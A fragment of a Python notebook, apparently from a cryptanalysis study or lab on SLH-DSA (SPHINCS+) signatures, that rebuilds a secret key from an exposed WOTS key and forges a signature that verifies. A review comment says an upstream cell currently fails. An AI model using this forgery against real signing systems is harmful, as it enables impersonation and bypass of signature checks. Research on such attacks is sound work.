    return bottom_part + forged_sig + top_part

# Build a full secret key around the grafted SK.seed with a fresh SK.prf.
# NOTE(review): `sk_seed` comes from the tree-grafting cell, which currently fails to unpack its result.
sk_prf = os.urandom(n)
_, sk = slh.slh_keygen_internal(sk_seed, sk_prf, pk_seed, params)

# Genuine signature that contains the valid key at the exposed address.
valid_key = next(key for key in groups[most_exposed_adrs] if key.valid)

wots_bytes = slh.len * n
xmss_bytes = hp * n
fors_bytes = k * (n + a * n)
sig_len = n + fors_bytes + d * (wots_bytes + xmss_bytes)
stored_sig = sigs[valid_key.sig_idx]
m = stored_sig[sig_len:]            # the signed message is appended after the signature
valid_sig = stored_sig[:sig_len]

# Messages may not be UTF-8; replace undecodable bytes for display only.
msg_text = m.decode(errors="replace")
print(f'verifying message "{msg_text}" with valid signature')
suc = slh.slh_verify_internal(m, valid_sig, pk, params)
print("Signature verification result:", suc)

print(f'Signing message "{msg_text}" with compromised key')
sig = forge(valid_sig, sk, pk, most_exposed_adrs, most_exposed_key, m, params)
print(f'verifying message "{msg_text}" with forged signature')
suc = slh.slh_verify_internal(m, sig, pk, params)
print("Signature verification result:", suc)